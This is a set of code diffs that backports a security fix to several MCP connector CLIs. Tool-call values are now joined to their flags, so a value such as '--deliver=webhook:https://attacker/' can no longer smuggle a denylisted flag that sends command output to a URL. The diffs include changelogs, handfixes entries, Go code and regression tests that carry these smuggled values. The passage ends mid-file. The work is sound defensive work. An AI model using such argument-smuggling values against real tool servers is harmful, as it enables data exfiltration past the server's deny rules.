+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/syncro/handfixes.json
+++ b/skills/syncro/handfixes.json
@@ -172,6 +172,35 @@
      "not_contains": "3650d"
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/tactical-rmm/CHANGELOG.md
+++ b/skills/tactical-rmm/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/tactical-rmm/CHANGELOG.md
+++ b/skills/tactical-rmm/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/tactical-rmm/CHANGELOG.md
+++ b/skills/tactical-rmm/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/tactical-rmm/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/tactical-rmm/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/tactical-rmm/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/tactical-rmm/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/tactical-rmm/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/tactical-rmm/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/tactical-rmm/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/tactical-rmm/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/tactical-rmm/handfixes.json
+++ b/skills/tactical-rmm/handfixes.json
@@ -126,6 +126,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/tactical-rmm/handfixes.json
+++ b/skills/tactical-rmm/handfixes.json
@@ -141,8 +141,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -152,7 +164,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/threatlocker/CHANGELOG.md
+++ b/skills/threatlocker/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.3.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.3.4] - 2026-09-06
 
 ### Fixed

--- a/skills/threatlocker/CHANGELOG.md
+++ b/skills/threatlocker/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.3.4] - 2026-09-06
 

--- a/skills/threatlocker/CHANGELOG.md
+++ b/skills/threatlocker/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.3.4] - 2026-09-06

--- a/skills/threatlocker/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/threatlocker/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/threatlocker/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/threatlocker/cli/internal/mcp/cobratree/shellout.go
@@ -347,6 +347,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -356,10 +363,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -367,11 +374,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/threatlocker/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/threatlocker/cli/internal/mcp/cobratree/shellout_test.go
@@ -89,7 +89,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -118,7 +118,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -174,7 +174,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -392,7 +392,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -831,4 +831,113 @@ func toolResultText(result *mcplib.CallToolResult) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/threatlocker/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/threatlocker/cli/internal/mcp/cobratree/shellout_test.go
@@ -892,15 +892,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/threatlocker/handfixes.json
+++ b/skills/threatlocker/handfixes.json
@@ -515,6 +515,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
